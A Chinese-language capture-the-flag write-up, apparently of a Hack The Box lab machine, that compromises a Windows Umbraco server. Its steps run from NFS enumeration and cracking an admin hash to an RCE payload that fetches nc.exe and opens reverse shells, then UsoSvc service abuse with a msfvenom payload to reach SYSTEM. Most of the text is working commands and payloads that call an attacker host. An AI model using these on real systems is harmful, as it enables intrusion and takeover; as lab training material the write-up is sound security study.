概述
目标主机是一台windows服务器,上面部署了一个web站点,对外开放了21、80、445、2049等,先利用目标机器开放的nfs
获取信息,发现共享目录下面有一个日志文件中记录了疑似口令的hash,通过彩虹表获取到明文密码,然后通过获取到的信息得知web网站的CMS是Umbraco
,查询版本号发现有一个RCE的漏洞,利用漏洞获取一个反弹shell,进一步发现该账号可以修改UsoSvc
服务,进而通过该服务获取提权的反弹shell
信息收集
root@vultr:~# nmap -sV -sC 10.10.10.180
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-26 06:23 UTC
Nmap scan report for 10.10.10.180
Host is up (0.072s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3m53s, deviation: 0s, median: 3m53s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-26 06:28:48
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.42 seconds
从扫描结果看到目标主机开放了nfs
服务,nfs工具查看目标目录并挂载到本机
apt install nfs-common
root@vultr:~# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@vultr:~# mount -t nfs 10.10.10.180:/site_backups /htb
root@vultr:~# ls -l /htb
total 115
drwx------ 2 nobody 4294967294 64 Feb 20 17:16 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 17:17 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 App_Plugins
drwx------ 2 nobody 4294967294 8192 Feb 20 17:16 Config
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Media
drwx------ 2 nobody 4294967294 8192 Feb 20 17:16 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 05:57 Web.config
drwx------ 2 nobody 4294967294 64 Feb 20 17:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 17:16 bin
drwx------ 2 nobody 4294967294 64 Feb 20 17:16 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
drwx------ 2 nobody 4294967294 64 Feb 20 17:16 scripts
通过一番查看,最终在App_Data
下面的Umbraco.sdf
里面找到疑似admin
账号和口令
root@vultr:/htb/App_Data# strings Umbraco.sdf |grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
从上面的信息看b8be16afba8c314ad33d812f22a04991b90e2aaa
应该是sha1,随便找个sha1破解的网站查一下,发现原始信息就是baconandcheese
,简单验证一下发现这个账号应该是一个应用账号,没法直接登录OS
从获取到的信息可以知道,目标机器使用的CMS是Umbraco
,google一下发现一个Umbraco RCE漏洞的PoC,修改里面的Payload,先把nc.exe
下载过去
payload = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
public string xml()
{ string cmd = "/c certutil -urlcache -split -f http://10.10.14.94/nc.exe c:/windows/temp/nc.exe"; System.Diagnostics.Process proc = new System.Diagnostics.Process();
proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output;Console.WriteLine(output); }
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="csharp_user:xml()"/>
</xsl:template>
</xsl:stylesheet> """;
执行,nc成功下载到目标机器
root@vultr:~# python3 umb.py
Start
[]
<div id="result"><?xml version="1.0" encoding="utf-16"?>**** Online ****
0000 ...
8eb0
CertUtil: -URLCache command completed successfully.
</div>
End
然后在本机开启nc监听4444端口准备接收反弹shell
nc -lvnp 4444
接下来修改payload,让目标机器执行nc启动反弹shell,修改payload中的命令部分,再次执行
/c c:/windows/temp/nc.exe 10.10.14.94 4444 -e cmd.exe
获取到反弹shell
root@vultr:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.94] from (UNKNOWN) [10.10.10.180] 49767
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
权限提升
收集目标主机信息,这里使用PowerUp.ps1
c:\Users\Public>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Public> . ./PowerUp.ps1
. ./PowerUp.ps1
PS C:\Users\Public> invoke-allchecks
invoke-allchecks
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
看到返回信息提示我们可以利用UsoSvc
的漏洞,这个通过这种方式我们可以让UsoSvc服务加载任意可执行程序,进而达成反弹shell的目的。
先尝试Invoke-ServiceAbuse -Name 'UsoSvc' -Command "c:\windows\temp\nc.exe -e cmd.exe 10.10.14.94 2222"
不知道为啥不起作用,于是还是用msfvenom
制作一个payload
sfvenom -p windows/shell_reverse_tcp lhost=10.10.14.94 lport=2222 -f exe >re.exe
本地先起一个nc监听2222
端口,准备接收反弹shell,然后把re.exe上传到目标主机,然后在目标机器上修改usosvc配置,并重启服务
c:\Users\Public>sc config usosvc binpath="c:\windows\temp\re.exe"
sc config usosvc binpath="c:\windows\temp\re.exe"
[SC] ChangeServiceConfig SUCCESS
c:\Users\Public>sc stop usosvc
sc stop usosvc
[SC] ControlService FAILED 1062:
The service has not been started.
c:\Users\Public>sc start usosvc
sc start usosvc
此时本机接收到反弹shell
root@vultr:~# nc -lvnp 2222
listening on [any] 2222 ...
connect to [10.10.14.94] from (UNKNOWN) [10.10.10.180] 49779
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>dir c:\users\administrator\desktop
dir c:\users\administrator\desktop
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of c:\users\administrator\desktop
02/20/2020 03:41 AM <DIR> .
02/20/2020 03:41 AM <DIR> ..
05/26/2020 12:38 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 19,239,432,192 bytes free